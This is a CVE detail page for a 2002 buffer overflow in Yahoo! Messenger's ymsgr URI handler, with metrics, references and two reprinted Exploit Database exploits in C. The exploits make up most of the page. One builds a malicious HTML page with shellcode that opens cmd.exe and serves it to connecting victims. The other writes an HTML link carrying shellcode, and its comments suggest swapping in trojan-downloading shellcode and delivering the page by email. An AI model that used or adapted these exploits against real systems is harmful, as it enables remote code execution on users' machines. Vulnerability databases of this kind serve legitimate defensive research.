CVE-2002-0031 : Detail

CVE-2002-0031

21.42%V4
Local
2002-06-11
02h00 +00:00
2002-06-15
07h00 +00:00

CVE Descriptions

Buffer overflows in Yahoo! Messenger 5,0,0,1064 and earlier allow remote attackers to execute arbitrary code via a ymsgr URI with long arguments to (1) call, (2) sendim, (3) getimv, (4) chat, (5) addview, or (6) addfriend.

CVE Information

Metrics

Metrics Score Severity CVSS Vector Source
V2 4.6 AV:L/AC:L/Au:N/C:P/I:P/A:P nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVEs according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVEs. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVEs.

Exploit information

Exploit Database EDB-ID : 45

Publication date : 2003-06-22 22h00 +00:00
Author : Rave
EDB Verified : Yes

/* * * ---[ Remote yahoo Messenger V5.5 exploiter on Windows XP ]--- * * Dtors Security Research (DSR) * Code by: Rave * * The buffer looks like this * * |-<-<-<--| * <Fillup x offset><JMP 0x3><EIP><NOPS><SHELLCODE> * ^__________^ * * */ #include <windows.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdio.h> /* These are the usual header files */ #include <winsock2.h> #include <stdio.h> #include <stdlib.h> #define MAXDATASIZE 555 /* Max number of bytes of data */ #define BACKLOG 200 /* Number of allowed connections */ static int port =80; /* library entry inside msvcrt.dll to jmp 0xc (EB0C); */ char sraddress[8]="\x16\xd8\xE8\x77"; /* This shellcode just executes cmd.exe nothing special here.. * the victim gets a cmd shell on his desktop :) lol ! \ */ unsigned char shellcode[] = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x8b\xec\x55\x8b\xec\x68\x65\x78\x65\x20\x68\x63\x6d\x64\x2e\x8d\x45\xf8\x50\xb8" "\x44\x80\xbf\x77" // 0x78bf8044 <- adress of system() "\xff\xd0"; // call system() static int port; void Usage(char *programName) { printf("\n\t\t---------------------------------------------------\n"); printf("\t\t\t\tDtors Security Research (DSR) \n"); printf("\t\t\t\tCode by: Rave\n"); printf("\t\t\t\tMail: rave@dtors.net\n"); printf("\t\t---------------------------------------------------\n\n"); /* Modify here to add your usage message when the program is * called without arguments */ printf("\t\t---------------------------------------------------\n\n"); fprintf(stdout,"\t\t-P local webserver server portnumber\n"); fprintf(stdout,"\t\t-g greatz to:\n\n\n\n\n"); printf("\t\t---------------------------------------------------\n\n"); } /* returns the index of the first argument that is not an option; i.e. 
does not start with a dash or a slash */ int HandleOptions(int argc,char *argv[]) { int i,firstnonoption=0; for (i=1; i< argc;i++) { if (argv[i][0] == '/' || argv[i][0] == '-') { switch (argv[i][1]) { /* An argument -? means help is requested */ case '?': Usage(argv[0]); break; case 'P': port=atoi(argv[i+1]);break; case 'H': if (!stricmp(argv[i]+1,"help")) { Usage(argv[0]); break; } /* If the option -h means anything else * in your application add code here * Note: this falls through to the default * to print an "unknow option" message */ /* add your option switches here */ default: fprintf(stderr,"unknown option %s\n",argv[i]); break; } } else { firstnonoption = i; break; } } return firstnonoption; } int main(int argc,char *argv[]) { FILE *fptr; unsigned char buffer[5000]; int offset=320; // <-- the offset off the buffer = 320 x NOP; (At 321 whe begin the instruction pointer change) int fd,fd2 ,i,numbytes,sin_size; /* files descriptors */ char sd[MAXDATASIZE]; /* sd will store send text */ struct sockaddr_in server; /* server's address information */ struct sockaddr_in client; /* client's address information */ struct hostent *he; /* pointer for the host entry */ WSADATA wsdata; WSAStartup(0x0101,&wsdata); if (argc == 1) { /* If no arguments we call the Usage routine and exit */ Usage(argv[0]); return 1; } HandleOptions(argc,argv); fprintf(stdout,"Creating index.html: "); if ((fptr =fopen("index.html","w"))==NULL){ fprintf(stderr,"Failed\n"); exit(1); } else { fprintf(stderr,"Done\n"); } // memseting the buffers for preperation memset(sd,0x00,MAXDATASIZE); memset(buffer,0x00,offset+32+strlen(shellcode)); memset(buffer,0x90,offset); // whe place the a jmp ebp+0x3 instuction inside the buffer // to jump over the eip changing bytes at the en offset // // <fillup x offset>jmp 0x3<eip><NOPS><shellcode> // |____________^ buffer[offset-4]=0xeb; buffer[offset-3]=0x03; memcpy(buffer+offset,sraddress,4); memcpy(buffer+offset+4,shellcode,strlen(shellcode)); // here whe make 
the index.html // whe open it again if some one connects to the exploiting server // and send it over to the victim. fprintf(fptr,"<!DOCTYPE HTML PUBLIC %c-//W3C//DTD HTML 4.0 Transitional//EN%c>",0x22,0x22); fprintf(fptr,"<html>"); fprintf(fptr,"<title>Oohhh my god exploited</title>\n"); fprintf(fptr,"<body bgcolor=%cblack%c>",0x22,0x22); fprintf(fptr,"<body>"); fprintf(fptr,"<font color=%c#C0C0C0%c size=%c2%c face=%cverdana, arial, helvetica, sans-serif%c>", 0x22,0x22,0x22,0x22,0x22,0x22); fprintf(fptr,"<B>Dtors Security Research (DSR)</B>\n"); fprintf(fptr,"<p>Yah000 Messager Version 5.5 exploit....</p>\n"); fprintf(fptr,"<pre>"); fprintf(fptr,"<IFRAME SRC=%cymsgr:call?%s%c>Contach heaven</html></body>\x00\x00\x00",0x22,buffer,0x22); fprintf(fptr,"<IFRAME SRC=%chttp://www.boothill-mc.com/images/skull-modsm_01.gif%c>....</html> </body>\x00\x00\x00",0x22,0x22); fclose(fptr); // <-- closing index.html again // Some extra debuging information fprintf(stdout,"Using port: %d\n",port); fprintf(stdout,"\nStarting server http://localhost:%d: ",port); if ((fd=socket(AF_INET, SOCK_STREAM, 0)) == -1 ){ /* calls socket() */ printf("socket() error\n"); exit(1);} else { fprintf(stderr,"Done\n"); } server.sin_family = AF_INET; server.sin_port = htons(port); server.sin_addr.s_addr = INADDR_ANY; /* INADDR_ANY puts your IP address automatically */ memset(server.sin_zero,0,8); /* zero the rest of the structure*/ if(bind(fd,(struct sockaddr*)&server,sizeof(struct sockaddr))==-1){ /* calls bind() */ printf("bind() error\n"); exit(-1); } if(listen(fd,BACKLOG) == -1){ /* calls listen() */ printf("listen() error\n"); exit(-1); } while(1){ sin_size=sizeof(struct sockaddr_in); if ((fd2 = accept(fd,(struct sockaddr *)&client,&sin_size))==-1){ /* calls accept() */ printf("accept() error\n"); exit(1); } if ((he=gethostbyname(inet_ntoa(client.sin_addr)))==NULL){ printf("gethostbyname() error\n"); exit(-1); } printf("You got a connection from %s (%s)\n", inet_ntoa(client.sin_addr),he->h_name); 
/* prints client's IP */ fprintf(stdout,"\nOpening index.html for remote user: "); if ((fptr =fopen("index.html","r"))==NULL){ fprintf(stderr,"Failed\n"); exit(1); } else { fprintf(stderr,"Done\n"); } fprintf(stdout,"Sending the overflow string... "); // reading the index.html file and sending its // contents to the connected victim while (!feof(fptr)) { send(fd2,sd,strlen(sd),0); numbytes=fread(sd,sizeof(char),MAXDATASIZE,fptr); sd[numbytes * sizeof(char)]='\0'; } send(fd2,sd,strlen(sd),0); printf("\n\n\nExploit Done....\n\n\n"); printf("A shell is started @ %s :) lol\n\n\nPress any key to exit the exploit",inet_ntoa(client.sin_addr),he->h_name); gets(sd); exit(0); } return 0; } // milw0rm.com [2003-06-23]
Exploit Database EDB-ID : 21484

Publication date : 2002-05-26 22h00 +00:00
Author : bob
EDB Verified : Yes

// source: https://www.securityfocus.com/bid/4837/info Yahoo! Messenger configures the 'ymsgr:' URI handler when it is installed. The handler invokes YPAGER.EXE with the supplied parameters. YPAGER.EXE accepts the 'call' argument; it is used for starting the 'Call Center' feature. There is a stack overrun condition in the 'Call Center' component that may be exploited through a specially constructed URI. It has been reported that the stack frame of the affected function will be corrupted if the argument to the 'call' parameter passed to YPAGER.EXE is of 268 bytes or greater in length. Attackers may exploit this vulnerability to execute arbitrary code. /* Yahpoo.c by bob@dtors.net [www.dtors.net] [DSR] * * Why Yahoo Messenger have not fixed this vulnerbility * I dont know...but either way they are stupid! * * This exploit has been tested on: * Yahoo Messenger 5,5,0,1246 * Yahoo Module 5,5,0,454 * * For: * Windows 2000 Professional 5.0.2195 SP3 * * Rave@dtors.net has released a windows [exe] version of this * exploit but for Windows XP Pro SP1. * So both targets are vulnerable XP/2k...some addresses might need changing. * * Problems that may occur: * * The addresses used may vary from box to box..so they might need changing. * The stack may keep on changing the location of your shellcode address..you * need to hit a static sector that will not alternate. [this is the reason we jmp] * There exist two crashes...the first one we bypass..this is the access violation * when you hit the nop sled the first time round. The second crash is where we * hit the nop sled...so dont get confused between the 2. * * The shellcode used here...will not do anything malicious..just opens a popup box * You can change this shellcode to something else...but the buffer is not very big * so there is no chance of a bind shell or anything. * Sloth from nopninjas.com has a shellcode that will download a trojan * and execute it. 
Nice and small as well ;) * * Thats about it...this exploit will lead to remote command execution on the * victim. Bare in mind this is triggered via bad URI handling...and the victim * needs to actually view the evil html file..this can be done automatically via * email >:) * * Big Lovin to rica. * Thanks to rave for his time. * Greetz: * mercy, Redg, opy, phreez, eSDee, ilja, looney, The_itch, angelo, inv, kokanin, * macd, SiRVu|can, Sally, Lucipher, gloomy, phaze, uproot, b0f. * special thanks to sloth@nopninjas * * * bob@dtors.net www.dtors.net */ #include <stdio.h> #include <stdlib.h> #include <string.h> #define MessageBoxA "\x1d\x97\x53\x01" char ret[8]= "\xD5\x96\x7A\x01"; unsigned char win32_msgbox[] = { "\xEB\x19\x5E\x33\xC9\x89\x4E\x05\xB8" MessageBoxA "\x2D\x01\x01" "\x01\x01\x8B\x18\x6A\x10\x56\x56\x51\xFF\xD3\xE8\xE2\xFF\xFF\xFF" "\x62\x6f\x62\xff\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" }; int main(int argc,char *argv[]) { FILE *evil; char *shellcode = win32_msgbox; unsigned char buffer[5000]; int offset=320; fprintf(stdout, "\n\tYahPoo.c By bob.\n"); fprintf(stdout, "Remote Exploit for Yahoo! Messenger 5.5\n"); fprintf(stdout, "\tDSR-[www.dtors.net]-DSR\n\n"); fprintf(stdout,"Makin' da EbUL HTML File... 
"); if ((evil =fopen("yahoo.html","w"))==NULL){ fprintf(stderr,"Failed\n"); exit(1); } else { fprintf(stderr,"Opened!\n"); } memset(buffer,0x00,offset+32+strlen(shellcode)); memset(buffer,0x90,offset); memcpy(buffer+offset,ret,4); memcpy(buffer+offset+4,shellcode,strlen(shellcode)); buffer[264] = 0xD4; //address of &shellcode buffer[265] = 0x96; buffer[266] = 0x7A; buffer[267] = 0x01; buffer[272] = 0xF5; //jmp 0xc [msvcrt.dll] buffer[273] = 0x01; buffer[274] = 0x01; buffer[275] = 0x78; fprintf(evil,"<html>"); fprintf(evil,"<title>Bought to you by dtors.net!</title>\n"); fprintf(evil,"<B>Dtors Security Research (DSR)</B>\n"); fprintf(evil,"<p>Yahoo Messenger 5.5 exploit....</p>\n"); fprintf(evil,"<pre>"); fprintf(evil,"<a href=%cymsgr:call?%s%c>!EbUL Link!</a></body></pre></html>\x00\x00\x00",0x22,buffer,0x22); fclose(evil); // <-- closing yahoo.html fprintf(stdout,"\nDa ebUL HTML file is >>yahoo.html<<\nEnjoy!\nwww.dtors.net\n\n"); } //end main

Products Mentioned

Configuration 0

Yahoo>>Messenger >> Version 5.0

References

http://www.cert.org/advisories/CA-2002-16.html
Tags : third-party-advisory, x_refsource_CERT
http://www.kb.cert.org/vuls/id/137115
Tags : third-party-advisory, x_refsource_CERT-VN
http://online.securityfocus.com/archive/1/274223
Tags : mailing-list, x_refsource_BUGTRAQ
http://www.securityfocus.com/bid/4837
Tags : vdb-entry, x_refsource_BID